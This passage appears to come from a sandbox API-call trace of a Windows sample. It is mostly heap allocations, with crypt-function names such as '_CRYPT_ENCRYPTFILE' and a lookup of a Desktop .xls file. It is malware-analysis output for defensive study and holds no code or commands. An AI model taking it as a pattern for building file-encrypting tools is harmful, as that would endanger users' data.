(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0118.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0118.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0118.236] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0118.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0118.236] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0118.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0118.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0118.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0118.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0118.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0118.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0118.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0118.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0118.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0118.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0118.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0118.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0118.239] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0118.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0118.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0118.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0118.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0118.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0118.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0118.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0118.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0118.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.241] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cea130, ftCreationTime.dwHighDateTime=0x1d5e5cb, ftLastAccessTime.dwLowDateTime=0x4328c100, ftLastAccessTime.dwHighDateTime=0x1d5ef89, ftLastWriteTime.dwLowDateTime=0x4328c100, ftLastWriteTime.dwHighDateTime=0x1d5ef89, nFileSizeHigh=0x0, nFileSizeLow=0x249c, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="0ocQBHc.xls", cAlternateFileName="")) returned 0x41ac700 [0118.241] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0118.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0118.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0118.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.242] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0118.242] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0118.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0118.242] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0118.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0118.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0118.242] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0118.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0118.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0118.243] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0118.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0118.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.243] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0118.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.244] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.244] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0118.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0118.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0118.245] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.245] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0118.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0118.245] HeapFree (in: 